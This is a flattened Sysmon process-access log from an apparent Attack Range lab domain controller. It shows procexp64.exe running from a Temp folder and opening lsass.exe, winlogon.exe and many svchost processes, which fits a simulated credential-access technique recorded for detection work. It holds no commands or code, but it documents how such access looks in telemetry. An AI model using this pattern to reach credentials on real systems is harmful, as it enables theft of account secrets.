dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790258Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790257Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790256Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790255Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790254Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790253Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790252Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790251Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790250Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790249Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790248Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790247Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790246Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790245Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790243Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790242Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790241Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790240Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790239Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790238Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790237Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790236Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.361{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 